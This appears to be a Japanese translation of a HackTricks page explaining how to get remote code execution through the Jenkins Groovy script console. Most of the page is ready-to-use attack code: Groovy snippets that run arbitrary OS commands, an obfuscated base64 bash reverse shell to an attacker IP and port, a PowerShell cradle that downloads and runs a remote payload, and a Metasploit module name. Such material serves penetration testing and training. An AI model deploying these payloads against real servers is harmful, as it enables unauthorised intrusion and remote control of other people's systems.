Jenkins RCE with Groovy Script

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!

HackTricksをサポートする他の方法:

Jenkins RCE with Groovy Script

これはJenkinsで新しいプロジェクトを作成するよりも騒がしくありません。

  1. path_jenkins/script に移動します。

  2. テキストボックス内にスクリプトを入力します。

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

コマンドを実行するには:cmd.exe /c dir

linuxでは次のようにします:"ls /".execute().text

テキスト内で_クォート_と_シングルクォート_を使用する必要がある場合、ペイロードを実行するために_"""PAYLOAD"""_(トリプルダブルクォート)を使用できます。

別の便利なgroovyスクリプトは([INSERT COMMAND]を置き換えてください):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Linuxでのリバースシェル

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Windowsでのリバースシェル

HTTPサーバーを用意し、PSリバースシェルを使用して、Jekingをダウンロードして実行することができます:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

スクリプト

このプロセスを自動化するには、このスクリプトを使用できます。

MSFを使用してリバースシェルを取得できます:

msf> use exploit/multi/http/jenkins_script_console
AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

最終更新